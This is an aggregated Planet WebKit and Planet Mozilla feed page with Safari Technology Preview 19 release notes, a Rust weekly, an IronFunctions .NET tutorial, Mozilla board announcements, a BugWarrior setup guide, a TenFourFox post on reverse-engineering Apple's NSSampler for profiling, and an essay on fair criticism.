Planet WebKitRelease Notes for Safari Technology Preview 19

Safari Technology Preview Release 19 is now available for download for macOS Sierra. If you already have Safari Technology Preview installed, you can update from the Mac App Store’s Updates tab. This release covers WebKit revisions 208427-209238.

Touch Bar

  • Added support for Touch Bar in WebKit (r208452)

HTML Form Validation

  • Enabled HTML interactive form validation (r209060)

Pointer Lock API

  • Enabled Pointer Lock API (r208903)

Input Events

  • Fixed compositionEnd events to fire after input events when editing in IME (r208462)
  • Fixed firing an input event with color data when setting the foreground color for selected text (r208461)

URL Parser

  • Changed URL Parser to prevent treating the first slash after the colon as the path for URLs with no host (r208508)

Custom Elements

  • Fixed document.createElementNS to construct a custom element (r208716)

CSS Font Loading

  • Fixed promises failing to fire for FontFace.load() and FontFaceSet.load() (r208976, r208889)

Shadow DOM

  • Fixed triggering style recalculation when toggling a class in .class ::slotted(*) (r208610)
  • Fixed event.composedPath() to include window (r208641)
  • Fixed slot to work as a flex container (r208743)
  • Fixed the slotChange event to bubble and be dispatched once (r208817)
  • Fixed slot nodes that ignored transition events (r209065)
  • Fixed document.currentScript to be null when running a script inside a shadow tree (r208660)
  • Fixed the hover state when hovering over a slotted Text node (r208630)

Web Inspector

  • Added support to shift-click on a named color value to cycle through different color formats (r208857)
  • Added support for the Type Profiler and the Code Coverage Profiler in Workers (r208664)
  • Changed selecting folders to display content in the Resources sidebar (r208441)
  • Disabled Warning Filter in Debugger Tab by default (r208701)
  • Improved name sorting in HeapSnapshot data grids (r209115)
  • Improved Worker debugging to pause all targets and view call frames in all targets (r208725)
  • Improved Debugger stack traces to display names for Generator functions (r208885)
  • Improved Debugger to show execution lines for background threads (r208783)
  • Improved Debugger to include showing asynchronous call stacks (r209062, r209213)
  • Fixed URL Breakpoints that resolve in multiple workers to only appear in the UI once (r208746)
  • Fixed layout and display issues in the Settings tab (r208510, r208591, r208686)
  • Made checkbox labels clickable in the Settings tab (r208443)

Rendering

  • Fixed an issue where elements with a negative z-index could sometimes render behind the document body (r208981)
  • Changed the way unsupported emoji are drawn from being invisible to being the empty box (r208894)
  • Changed flex element wrapping to consider when the width is less than min-width (r209068)

Indexed Database 2.0

  • Implemented IDBCursor.continuePrimaryKey() (r208500)
  • Implemented IDBObjectStore.getKey() (r209197)
  • De-duplicated the names returned by IDBDatabase.objectStoreNames() (r208501)
  • Added support for the IDBDatabase.onclose event (r208568)
  • Fixed some issues with the firing of IDBRequest.onblocked events (r208609)
  • Improved the performance of key (de)serialization during SQLite lookups (r208771)
  • Improved SQLiteStatement performance throughout the SQLite backend (r209096, r209144)
  • Agressively flush the client’s request queue to the server (r209086)

Accessibility

  • Changed the inverted-colors media query to match on state change instead of page reload (r208915)
  • Fixed the implicit value for aria-level on headings to match the ARIA 1.1 specification (r208696)
  • Exposed aria-busy attribute for authors to indicate when an area of the page is finished updating (r208924)

WebDriver

  • Exposed navigator.webdriver if the page is controlled by automation (r209198)
  • Changed the automation session to terminate if the web process crashes (r208657)

Media

  • Fixed an issue where some animated images would not animate after reseting their animations (r209131)

Security

  • Changed the keygen element to require 2048 or higher RSA key lengths (r208858)
  • Changed window.name to be cleared after a cross-origin navigation (r209076)

Bug Fixes

  • Fixed an issue causing copied text to include the text of CDATA sections and comments (r208565)
  • Improved the performance of setting attributes on input elements of type text (r208653)
  • Fixed a crash when interacting with Issues and Pull Requests on github.com (r208967)
  • Fixed broken tab-focus navigation on some sites (r208922)
  • Fixed a JS bindings generation issue that erroneously caused IntersectionObserver to be exposed, which broke Pinterest, Strava and Netflix (r208983)

Planet MozillaThis Week in Rust 159

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Other Weeklies from Rust Community

Crate of the Week

This week's Crate of the Week is seahash, a statistically well-tested fast hash. Thanks to Vikrant Chaudhary for the suggestion! Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

93 pull requests were merged in the last week. This contains a good number of plugin-breaking changes.

New Contributors

  • Clar Charr
  • Theodore DeRego
  • Xidorn Quan

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now. This week's FCPs are:

New RFCs

  • Default struct field values.
  • Alloca for Rust. Add a builtin fn core::mem::reserve<'a, T>(elements: usize) -> StackSlice<'a, T> that reserves space for the given number of elements on the stack and returns a StackSlice<'a, T> to it which derefs to &'a [T].

Style RFCs

Style RFCs are part of the process for deciding on style guidelines for the Rust community and defaults for Rustfmt. The process is similar to the RFC process, but we try to reach rough consensus on issues (including a final comment period) before progressing to PRs. Just like the RFC process, all users are welcome to comment and submit RFCs. If you want to help decide what Rust code should look like, come get involved!

PRs:

Final comment period:

Other notable issues:

Upcoming Events

If you are running a Rust event please add it to the calendar to get it mentioned here. Email the Rust Community Team for access.

fn work(on: RustProject) -> Money

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Such large. Very 128. Much bits.

@nagisa introducing 128-bit integers in Rust.

Thanks to leodasvacas for the suggestion.

Submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and brson.

Planet MozillaPlaying with .NET (dotnet) and IronFunctions

Again if you missed it, IronFunctions is open-source, lambda compatible, on-premise, language agnostic, server-less compute service.

While AWS Lambda only supports Java, Python and Node.js, Iron Functions allows you to use any language you desire by running your code in containers.

With Microsoft being one of the biggest players in open source and .NET going cross-platform it was only right to add support for it in the IronFunctions's fn tool.

TL;DR:

The following demos a .NET function that takes in a URL for an image and generates a MD5 checksum hash for it:

Using dotnet with functions

Make sure you downloaded and installed dotnet. Now create an empty dotnet project in the directory of your function:

dotnet new  

By default dotnet creates a Program.cs file with a main method. To make it work with IronFunction's fn tool please rename it to func.cs.

mv Program.cs func.cs  

Now change the code as you desire to do whatever magic you need it to do. In our case the code takes in a URL for an image and generates a MD5 checksum hash for it. The code is the following:

using System;  
using System.Text;  
using System.Security.Cryptography;  
using System.IO;

namespace ConsoleApplication  
{
    public class Program
    {
        public static void Main(string[] args)
        {
            // if nothing is being piped in, then exit
            if (!IsPipedInput())
                return;

            var input = Console.In.ReadToEnd();
            var stream = DownloadRemoteImageFile(input);
            var hash = CreateChecksum(stream);
            Console.WriteLine(hash);
        }

        private static bool IsPipedInput()
        {
            try
            {
                bool isKey = Console.KeyAvailable;
                return false;
            }
            catch
            {
                return true;
            }
        }
        private static byte[] DownloadRemoteImageFile(string uri)
        {

            var request = System.Net.WebRequest.CreateHttp(uri);
            var response = request.GetResponseAsync().Result;
            var stream = response.GetResponseStream();
            using (MemoryStream ms = new MemoryStream())
            {
                stream.CopyTo(ms);
                return ms.ToArray();
            }
        }
        private static string CreateChecksum(byte[] stream)
        {
            using (var md5 = MD5.Create())
            {
                var hash = md5.ComputeHash(stream);
                var sBuilder = new StringBuilder();

                // Loop through each byte of the hashed data
                // and format each one as a hexadecimal string.
                for (int i = 0; i < hash.Length; i++)
                {
                    sBuilder.Append(hash[i].ToString("x2"));
                }

                // Return the hexadecimal string.
                return sBuilder.ToString();
            }
        }
    }
}

Note: IO with an IronFunction is done via stdin and stdout. This code

Using with IronFunctions

Let's first init our code to become IronFunctions deployable:

fn init <username>/<funcname>  

Since IronFunctions relies on Docker to work (we will add rkt support soon) the <username> is required to publish to docker hub. The <funcname> is the identifier of the function.

In our case we will use dotnethash as the <funcname>, so the command will look like:

fn init seiflotfy/dotnethash  

When running the command it will create the func.yaml file required by functions, which can be built by running:

Push to docker

fn push  

This will create a docker image and push the image to docker.

Publishing to IronFunctions

To publish to IronFunctions run ...

fn routes create <app_name>  

where <app_name> is (no surprise here) the name of the app, which can encompass many functions.

This creates a full path in the form of http://<host>:<port>/r/<app_name>/<function>

In my case, I will call the app myapp:

fn routes create myapp  

Calling

Now you can

fn call <app_name> <funcname>  

or

curl http://<host>:<port>/r/<app_name>/<function>  

So in my case

echo http://lorempixel.com/1920/1920/ | fn call myapp /dotnethash  

or

curl -X POST -d 'http://lorempixel.com/1920/1920/'  http://localhost:8080/r/myapp/dotnethash  

What now?

You can find the whole code in the examples on GitHub. Feel free to join the Iron.io Team on Slack.
Feel free to write your own examples in any of your favourite programming languages such as Lua or Elixir and create a PR :)

Planet MozillaWhy I’m joining Mozilla’s Board, by Helen Turvey

Today, I’m very honored to join Mozilla’s Board.

Firefox is how I first got in contact with Mozilla. The browser was my first interaction with free and open source software. I downloaded it in 2004, not with any principled stance in mind, but because it was better, faster, more secure and allowed me to determine how I used it, with add-ons and so forth.

Helen Turvey joins the Mozilla Foundation Board

Helen Turvey joins the Mozilla Foundation Board

My love of open began, seeing the direct implications for philanthropy, for diversity, moving from a scarcity to abundance model in terms of the information and data we need to make decisions in our lives. The web as a public resource is precious, and we need to fight to keep it an open platform, decentralised, interoperable, secure and accessible to everyone.

Mozilla is community driven, and it is my belief that it makes a more robust organisation, one that bends and evolves instead of crumbles when facing the challenges set before it. Whilst we need to keep working towards a healthy internet, we also need to learn to behave in a responsible manner. Bringing a culture of creating, not just consuming, questioning, not just believing, respecting and learning, to the citizens of the web remains front and centre.

I am passionate about people, and creating spaces for them to evolve, grow and lead in the roles they feel driven to effect change in. I am interested in all aspects of Mozilla’s work, but helping to think through how Mozilla can strategically and tactically support leaders, what value we can bring to the community who is working to protect and evolve the web is where I will focus in my new role as a Mozilla Foundation Board member.

For the last decade I have run the Shuttleworth Foundation, a philanthropic organisation that looks to drive change through open models. The FOSS movement has created widely used software and million dollar businesses, using collaborative development approaches and open licences. This model is well established for software, it is not the case for education, philanthropy, hardware or social development.

We try to understand whether, and how, applying the ethos, processes and licences of the free and open source software world to areas outside of software can add value. Can openness help provide key building blocks for further innovation? Can it encourage more collaboration, or help good ideas spread faster? It is by asking these questions that I have learnt about effectiveness and change and hope to bring that along to the Mozilla Foundation Board.

Planet MozillaHelen Turvey Joins the Mozilla Foundation Board of Directors

Today, we’re welcoming Helen Turvey as a new member of the Mozilla Foundation Board of Directors. Helen is the CEO of the Shuttleworth Foundation. Her focus on philanthropy and openness throughout her career makes her a great addition to our Board.

Throughout 2016, we have been focused on board development for both the Mozilla Foundation and the Mozilla Corporation boards of directors. Our recruiting efforts for board members has been geared towards building a diverse group of people who embody the values and mission that bring Mozilla to life. After extensive conversations, it is clear that Helen brings the experience, expertise and approach that we seek for the Mozilla Foundation Board.

Helen has spent the past two decades working to make philanthropy better, over half of that time working with the Shuttleworth Foundation, an organization that provides funding for people engaged in social change and helping them have a sustained impact. During her time with the Shuttleworth Foundation, Helen has driven the evolution from traditional funder to the current co-investment Fellowship model.

Helen was educated in Europe, South America and the Middle East and has 15 years of experience working with international NGOs and agencies. She is driven by the belief that openness has benefits beyond the obvious. That openness offers huge value to education, economies and communities in both the developed and developing worlds.

Helen’s contribution to Mozilla has a long history: Helen chaired the digital literacy alliance that we ran in UK in 2013 and 2014; she’s played a key role in re-imagining MozFest; and she’s been an active advisor to the Mozilla Foundation executive team during the development of the Mozilla Foundation ‘Fuel the Movement’ 3 year plan.

Please join me in welcoming Helen Turvey to the Mozilla Foundation Board of Directors.

Mitchell

You can read Helen’s message about why she’s joining Mozilla here.

Background:

Twitter: @helenturvey

High-res photo

Planet MozillaConnecting Bugzilla to TaskWarrior

I’ve mentioned before that I use TaskWarrior to organize my life. Mostly for work, but for personal stuff too (buy this, fix that thing around the house, etc.)

At Mozilla, at least in the circles I run in, the central work queue is Bugzilla. I have bugs assigned to me, suggesting I should be working on them. And I have reviews or “NEEDINFO” requests that I should respond to. Ideally, instead of serving two masters, I could just find all of these tasks represented in TaskWarrior.

Fortunately, there is an integration called BugWarrior that can do just this! It can be a little tricky to set up, though. So in hopes of helping the next person, here’s my configuration:

[general]
targets = bugzilla_mozilla, bugzilla_mozilla_respond
annotation_links = True
log.level = WARNING
legacy_matching = False

[bugzilla_mozilla]
service = bugzilla
bugzilla.base_uri = bugzilla.mozilla.org
bugzilla.ignore_cc = True
# assigned
bugzilla.query_url = https://bugzilla.mozilla.org/query.cgi?list_id=13320987&resolution=---&emailtype1=exact&query_format=advanced&emailassigned_to1=1&email1=dustin%40mozilla.com&product=Taskcluster
add_tags = bugzilla
project_template = moz
description_template = http://bugzil.la/ 
bugzilla.username = USERNAME
bugzilla.password = PASSWORD

[bugzilla_mozilla_respond]
service = bugzilla
bugzilla.base_uri = bugzilla.mozilla.org
bugzilla.ignore_cc = True
# ni?, f?, r?, not assigned
bugzilla.query_url = https://bugzilla.mozilla.org/query.cgi?j_top=OR&list_id=13320900&emailtype1=notequals&emailassigned_to1=1&o4=equals&email1=dustin%40mozilla.com&v4=dustin%40mozilla.com&o7=equals&v6=review%3F&f8=flagtypes.name&j5=OR&o6=equals&v7=needinfo%3F&f4=requestees.login_name&query_format=advanced&f3=OP&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&f5=OP&v8=feedback%3F&f6=flagtypes.name&f7=flagtypes.name&o8=equals
add_tags = bugzilla, respond
project_template = moz
description_template = http://bugzil.la/ 
bugzilla.username = USERNAME
bugzilla.password = PASSWORD

Out of the box, this tries to do some default things, but they are not very fine-grained. The bugzilla_query_url option overrides those default things (along with bugzilla_ignore_cc) to just sync the bugs matching the query.

Sadly, this does, indeed, require me to include my Bugzilla password in the configuration file. API token support would be nice but it’s not there yet – and anyway, that token allows everything the password does, so not a great benefit.

The query URLs are easy to build if you follow this one simple trick: Use the Bugzilla search form to create the query you want. You will end up with a URL containing buglist.cgi. Change that to query.cgi and put the whole URL in BugWarrior’s bugzilla_query_url parameter.

I have two stanzas so that I can assign the respond tag to bugs for wihch I am being asked for review or needinfo. When I first set this up, I got a lot of errors about duplicate tasks from BugWarrior, because there were bugs matching both stanzas. Write your queries carefully so that no two stanzas will match the same bug. In this case, I’ve excluded bugs assigned to me from the second stanza – why would I be reviewing my own bug, anyway?

I have a nice little moz report that I use in TaskWarrior. Its output looks like this:

ID  Pri Urg  Due        Description
 98 M   7.09 2016-12-04 add a docs page or blog post
 58 H   18.2            http://bugzil.la/1309716 Create a framework for displaying team dashboards
 96 H   7.95            http://bugzil.la/1252948 cron.yml for periodic in-tree tasks
 91 M   6.87            blog about bugwarrior config
111 M   6.71            guide to microservices, to help folks find the services they need to read th
 59 M   6.08            update label-matching in taskcluster/taskgraph/transforms/signing.py to use
 78 M   6.02            http://bugzil.la/1316877 Allow `test-sets` in `test-platforms.yml`
 92 M   5.97            http://bugzil.la/1302192 Merge android-test and desktop-test into a "test" k
 94 M   5.96            http://bugzil.la/1302804 Ensure that tasks in a taskgraph do not have duplic

Planet Mozilla45.6.0b1 available, plus sampling processes for fun and profit

Test builds for TenFourFox 45.6.0 are available (downloads, hashes, release notes). The release notes indicate the definitive crash fix in Mozilla bug 1321357 (i.e., the definitive fix for the issue mitigated in 45.5.1) is in this build; it is not, but it will be in the final release candidate. 45.6.0 includes the removal of HiDPI support, which also allowed some graphical optimizations the iMac G4 particularly improved with, the expansion of the JavaScript JIT non-volatile general purpose register file, an image-heavy scrolling optimization too late for the 45ESR cut that I pulled down, the removal of telemetry from user-facing chrome JS and various minor fixes to the file requester code. An additional performance improvement will be landed in 45ESR by Mozilla as a needed prerequisite for another fix; that will also appear in the final release. Look for the release candidate next week sometime with release to the public late December 12 as usual, but for now, please test the new improvements so far.

There is now apparently a potential workaround for those of you still having trouble getting the default search engine to stick. I still don't have a good theory for what's going on, however, so if you want to try the workaround please read my information request and post the requested information about your profile before and after to see if the suggested workaround affects that.

I will be in Australia for Christmas and New Years' visiting my wife's family, so additional development is likely to slow over the holidays. Higher priority items coming up will be implementing user agent support in the TenFourFox prefpane, adding some additional HTML5 features and possibly excising telemetry from garbage and cycle collection, but probably for 45.8 instead of 45.7. I'm also looking at adding some PowerPC-specialized code sections to the platform-independent Ion code generator to see if I can crank up JavaScript performance some more, and possibly some additional work to the AltiVec VP9 codec for VMX-accelerated intraframe prediction. I'm also considering adding AltiVec support to the Theora (VP3) decoder; even though its much lighter processing requirements yield adequate performance on most supported systems it could be a way to get higher resolution video workable on lower-spec G4s.

One of the problems with our use of a substantially later toolchain is that (in particular) debugging symbols from later compilers are often gibberish to older profiling and analysis tools. This is why, for example, we have a customized gdb, or debugging at even a basic level wouldn't be possible. If you're really a masochist, go ahead and compile TenFourFox with the debug profile and then try to use a tool like sample or vmmap, or even Shark, to analyze it. If you're lucky, the tool will just freeze. If you're unlucky, your entire computer will freeze or go haywire. I can do performance analysis on a stripped release build, but this yields sample backtraces which are too general to be of any use. We need some way of getting samples off a debug build but not converting the addresses in the backtrace to function names until we can transfer the samples to our own tools that do understand these later debugging symbols.

Apple's open source policy is problematic -- they'll open source the stuff they have to, and you can get at some components like the kernel this way, but many deep dark corners are not documented and one of those is how tools like /usr/bin/sample and Shark get backtraces from other processes. I suspect this is so that they can keep the interfaces unstable and avoid abetting the development of applications that depend on any one particular implementation. But no one said I couldn't disassemble the damn thing. So let's go.

(NB: the below analysis is based on Tiger 10.4.11. It is possible, and even likely, the interface changed in Leopard 10.5.)

With Depeche Mode blaring on the G5, because Dave Gahan is good for debugging, let's look at /usr/bin/sample since it's a much smaller nut to crack than Shark.

% otool -L /usr/bin/sample
/usr/bin/sample:
         /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 567.29.0)
         /System/Library/PrivateFrameworks/vmutils.framework/Versions/A/vmutils (compatibility version 1.0.0, current version 93.1.0)
         /usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)
         /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 88.3.4)

Interesting! A private framework! Let's see what Objective-C calls we might get (which are conveniently text strings).

% strings /usr/bin/sample |& more
__dyld_make_delayed_module_initializer_calls
__dyld_image_count
__dyld_get_image_name
__dyld_get_image_header
__dyld_NSLookupSymbolInImage
__dyld_NSAddressOfSymbol
libobjc
__objcInit
__dyld_mod_term_funcs
release
printStatistics
writeOutput:append:
stopSampling
sampleForDuration:interval:
preloadSymbols
initWithPid:symbolRichBinaries:
alloc
intValue
UTF8String
removeObjectAtIndex:
objectAtIndex:
count
indexOfObject:
arrayWithArray:
arguments
processInfo
forceStop
NSSampler
NSMutableArray
NSProcessInfo
NSAutoreleasePool
Interrupted
Not currently sampling -- exiting immediately.
-wait
-mayDie
-file
Waiting for '%s' to appear...
%s appeared.
%s cannot find a process you have access to which has a name like '%s'
sample
Sampling process %d each %u msecs %u times
syntax: sample <pid/partial name> <duration (secs)> { <msecs between samples> } <options>
options: {-mayDie} {-wait} {-subst <old> <new>}*
-file filename specifies where results should be written
-mayDie reads symbol information right away
-wait wait until the process named (usually by partial name) exists, then start sampling
-subst can be used to replace a stripped executable by another
Note that the program must have been started using a full path, rather than a relative path, for analysis to work, or that the -subst option must be specified
setObject:forKey:
dictionary
autorelease
mutableCopy
NSMutableDictionary
%s cannot examine process %d for unknown reasons, even though it appears to exist.
%s cannot examine process %d because the process does not exist.
%s cannot examine process %d (with name like %s) because it no longer appears to be running.
%s cannot examine process %d because you do not have appropriate privileges to examine it.
%s cannot examine process %d for unknown reasons.
-subst

Most of that looks fairly straightforward Objective-C stuff, but what's NSSampler? That's not documented anywhere. Magic Hat can't find it either with the default libraries, but it does if we add those private frameworks. If I use class-dump (3.1.2 works with 10.4), I can get a header file with its methods and object layout. (The header file it generates is usually better than Magic Hat's since Magic Hat sorts things in alphabetical rather than memory order, which will be problematic shortly.) Edited down, it looks like this. (I added the byte offsets, which are only valid for the 32-bit PowerPC OS X ABI.)

@interface NSSampler : NSObject

/*
{
00 BOOL _stop;
04 BOOL _stopped;
08 unsigned int _task;
12 int _pid;
16 double _duration;
24 double _interval;
32 NSMutableArray *_sampleData;
36 NSMutableArray *_sampleTimes;
40 double _previousTime;
48 unsigned int _numberOfDataPoints;
52 double _sigma;
60 double _max;
68 unsigned int _sampleNumberForMax;
72 ImageSymbols *_imageSymbols;
76 NSDictionary *_symbolRichBinaryMappings;
80 BOOL _writeBadAddresses;
84 TaskMemoryCache *_tmc;
88 BOOL _stacksFixed;
92 BOOL _sampleSelf;
96 struct backtraceMagicNumbers _magicNumbers;
}
*/

- (void) _cleanupStacks;
- (void) _initStatistics;
- (void) _makeHighPriority;
- (void) _makeTimeshare;
- (void) _runSampleThread: (id) parameter1;
- (void) dealloc;
- (void) finalize;
- (void) forceStop;
- (void) getStatistics: (void*) parameter1;
- (id) imageSymbols;
- (id) initWithPid: (int) parameter1;
- (id) initWithPid: (int) parameter1 symbolRichBinaries: (id) parameter2;
- (id) initWithSelf;
- (void) preloadSymbols;
- (void) printStatistics;
- (id) rawBacktraces;
- (void) sampleForDuration2: (double) parameter1 interval: (double) parameter2;
- (void) sampleForDuration: (unsigned int) parameter1 interval: (unsigned int) parameter2;
- (int) sampleTask;
- (void) setImageSymbols: (id) parameter1;
- (void) startSamplingWithInterval: (unsigned int) parameter1;
- (void) stopSampling;
- (id) stopSamplingAndReturnCallNode;
- (void) writeBozo;
- (void) writeOutput: (id) parameter1 append: (char) parameter2;

@end

Okay, so now we know what methods are there. How does one call this thing? Let's move to the disassembler. I'll save you my initial trudging through the machine code and get right to the good stuff. I've annotated critical parts below from stepping through the code in the debugger.


% otool -tV /usr/bin/sample
/usr/bin/sample:
(__TEXT,__text) section
00002aa4 or r26,r1,r1 << enter
00002aa8 addi r1,r1,0xfffc
00002aac rlwinm r1,r1,0,0,26
00002ab0 li r0,0x0
00002ab4 stw r0,0x0(r1)
:
:
:
00003260 b 0x3310
00003264 bl 0x3840 ; symbol stub for: _getgid
00003268 bl 0x37d0 ; symbol stub for: _setgid

This looks like something that's trying to get at a process. Let's see what's here.


0000326c lis r3,0x0
00003270 or r4,r30,r30
00003274 addi r3,r3,0x3b9c
00003278 or r5,r29,r29
0000327c or r6,r26,r26
00003280 bl 0x37c0 ; symbol stub for: _printf$LDBL128 // "Sampling process ..."
00003284 lbz r0,0x39(r1)
00003288 cmpwi cr7,r0,0x1
0000328c bne+ cr7,0x32a0 // jumps to 32a0
:
:
:
000032a0 lis r4,0x0
000032a4 lwz r3,0x0(r31)
000032a8 or r5,r25,r25
000032ac lwz r4,0x5010(r4) // 0x399c "sampleForDuration:..."
000032b0 or r6,r23,r23
000032b4 bl 0x3800 ; symbol stub for: _objc_msgSend
000032b8 lis r4,0x0
000032bc lwz r3,0x0(r31)
000032c0 lwz r4,0x500c(r4) // 0x946ba288 "stopSampling"
000032c4 bl 0x3800 ; symbol stub for: _objc_msgSend
000032c8 lis r4,0x0
000032cc lwz r3,0x0(r31)
000032d0 lwz r4,0x5008(r4) // 0x3978 "writeOutput:..."
000032d4 or r5,r22,r22
000032d8 li r6,0x0
000032dc bl 0x3800 ; symbol stub for: _objc_msgSend

That seems simple enough. It seems to allocate and initialize an NSSampler object, (we assume) sets it up with [sampler initWithPid], calls [sampler sampleForDuration], calls [sampler stopSampling] and then calls [sampler writeOutput] to write out the result.

This is not what we want to do, however. What I didn't see in either the disassembly or the class description was an explicit step to convert addresses to symbols, which is what we want to avoid. We might well suspect -(void) writeOutput is doing that, and if we put together a simple-minded program to make these calls as sample does, we indeed get a freeze when we try to write the output. We want to get to the raw addresses instead, but Apple doesn't provide any getter for those tantalizing NSMutableArrays containing the sample data.

Unfortunately for Apple, class-dump gave us the structure of the NSSampler object (recall that Objective-C objects are really just structs with delusions of grandeur), and conveniently those object pointers are right there, so we can pull them out directly! Since they're just NSArrays, hopefully they're smart enough to display themselves. Let's see. (In the below, replace XXX with the process you wish to spy on.)


/* gcc -g -o samplemini samplemini.m \
    -F/System/Library/PrivateFrameworks \
    -framework Cocoa -framework CHUD \
    -framework vmutils -lobjc */

#include <Cocoa/Cocoa.h>
#include "NSSampler.h"

int main(int argc, char **argv) {
    NSSampler *sampler;
    NSMutableArray *sampleData;
    NSMutableArray *sampleTimes;
    uint32_t count, sampleAddr;
    NSAutoreleasePool *shutup = [[NSAutoreleasePool alloc] init];

    sampler = [[NSSampler alloc] init];
    [sampler initWithPid:XXX]; // you provide
    [sampler sampleForDuration:10 interval:10]; // 10 seconds, 10 msec
    [sampler stopSampling];

    // break into the NSSampler struct
    sampleAddr = (uint32_t)sampler;
    count = *(uint32_t *)(sampleAddr + 48);
    fprintf(stdout, "count = %i\n", count);
    sampleData = (NSMutableArray *)*(uint32_t *)(sampleAddr + 32);
    sampleTimes = (NSMutableArray *)*(uint32_t *)(sampleAddr + 36);
    fprintf(stdout, "%s", [[sampleData description] cString]);
    fprintf(stdout, "%s", [[sampleTimes description] cString]);

    [sampler dealloc];
    return 0;
}
Drumroll please.

count = 519
(
    <NSStackBacktrace: Thread 1503: 0x9000af48 0xefffdfd0 0x907de9ac 0x907de2b0 0x932bcb20 0x932bc1b4 0x932bc020 0x937a1734 0x937a13f8 0x06d53d3c 0x9379d93c 0x0 6d57bc8 0x07800f48 0x0785f004 0x0785f9cc 0x0785fd20 0x00004ed4 0x00001d5c 0x0000 1a60 0x9000ae9c 0xffffffe1 > ,
    <NSStackBacktrace: Thread 1603: 0x9002ec8c 0x00424b10 0x05069cb4 0x0504638c 0x050490e0 0x05056600 0x050532cc 0x9002b908 0x0506717c 0x0000016b > ,
    <NSStackBacktrace: Thread 1703: 0x9002bfc8 0x90030a7c 0x015a0b84 0x04d4d40c 0x015a1f18 0x9002b908 0x90030aac 0xffffffdb > ,
:
:
:
)(
    0.01796096563339233,
    0.01785099506378174,
    0.01814299821853638,
    0.01780200004577637,
:
:
:
)

We now have the raw backtraces and the timings, in fractions of a second. There is obviously much more we can do with this, and subsequent to my first experiment I improved the process further, but this suffices for explaning the basic notion. In a future post we'll look at how we can turn those addresses into actual useful function names, mostly because I have a very hacky setup to do so right now and I want to refine it a bit more. :) The basic notion is to get the map of where dyld loaded each library in memory and then compute which function is running based on that offset from the sampled address. /usr/bin/vmmap would normally be the tool we'd employ to do this, but it barfs on TenFourFox too. Fortunately our custom gdb7 can get such a map, at least on a running process. More on that later.

One limitation is that NSSampler doesn't seem able to get samples more frequently than every 15ms or so from a running TenFourFox process even if you ask. I'm not sure yet why this is because other processes have substantially less overhead, though it could be thread-related. Also, even though NSSampler accepts an interval argument, it will grab samples as fast as it can no matter what that interval is. When run against Magic Hat as a test it grabbed them as fast as 0.1ms, so stand by for lots of data!

Incidentally, this process is not apparently what Shark does; Shark uses the later PerfTool framework and an object called PTSampler to do its work instead of vmutils. Although it has analogous methods, the structure of PTSampler is rather more complex than NSSampler and I haven't fully explored its depths. Nevertheless, when it works, Shark can get much more granular samples of processor activity than NSSampler, so it might be worth looking into for a future iteration of this tool. For now, I can finally get backtraces I can work with, and as a result, hopefully some very tricky problems in TenFourFox might get actually solved in the near future.

Planet MozillaTaking a look behind the scenes before publicly dismissing something

Lately I started a new thing: watching “behind the scenes” features of movies I didn’t like. At first this happened by chance (YouTube autoplay, to be precise), but now I do it deliberately and it is fascinating.

Van Helsing to me bordered on the unwatchable, but as you can see there are a lot of reasons for that.

When doing that, one thing becomes clear: even if you don’t like something — *it was done by people*. People who had fun doing it. People who put a lot of work into it. People who — for a short period of time at least — thought they were part of something great.

That the end product us flawed or lamentable might not even be their fault. Many a good movie was ruined in the cutting room or hindered by censorship.
Hitchcock’s masterpiece Psycho almost didn’t make it to the screen because you see the flushing of a toilet. Other movies are watered down to get a rating that is more suitable for those who spend the most in cinemas: teenagers. Sometimes it is about keeping the running time of the movie to one that allows for just the right amount of ads to be shown when aired on television.

Take for example Halle Berry as Storm in X-Men. Her “What happens to a toad when it gets struck by lightning? The same thing that happens to everything else.” in her battle with Toad is generally seen as one of the cheesiest and most pointless lines:

This was a problem with cutting. Originally this is a comeback for Toad using this as his tagline throughout the movie:

However, as it turns out, that was meant to be the punch line to a running joke in the movie. Apparently, Toad had this thing that multiple times throughout the movie, he would use the line ‘Do you know what happens when a Toad…’ and whatever was relevant at the time. It was meant to happen several times throughout the movie and Storm using the line against him would have actually seemed really witty. If only we had been granted the context.

In many cases this extra knowledge doesn’t change the fact that I don’t like the movie. But it makes me feel different about it. It makes my criticism more nuanced. It makes me realise that a final product is a result of many changes and voices and power being yielded and it isn’t the fault of the actors or sometimes even the director.

And it is arrogant and hurtful of me to viciously criticise a product without knowing what went into it. It is easy to do. It is sometimes fun to do. It makes you look like someone who knows their stuff and is berating bad quality products. But it is prudent to remember that people are behind things you criticise.

Let’s take this back to the web for a moment. Yesterday I had a quick exchange on Twitter that reminded me of this approach of mine.

  • Somebody said people write native apps because a certain part of the web stack is broken.
  • Somebody else answered that if you want to write apps that work you shouldn’t even bother with JavaScript in the first place
  • I replied that this makes no sense and is not helping the conversation about the broken technology. And that it is overly dismissive and hurtful
  • The person then admitted knowing nothing about app creation, but was pretty taken aback by me saying what he did was hurtful instead of just dismissive.

But it was. And it is hurtful. Right now JavaScript is hot. JavaScript is relatively easy to learn and the development environment you need for it is free and in many cases a browser is enough. This makes it a great opportunity for someone new to enter our market. Matter of fact, I know people who do exactly that right now and get paid JavaScript courses by the unemployment office to up their value in the market and find a job.

Now imagine this person seeing this exchange. Hearing a developer relations person who worked for the largest and coolest companies flat out stating that what you’re trying to get your head around right now is shit. Do you think you’ll feel empowered? I wouldn’t.

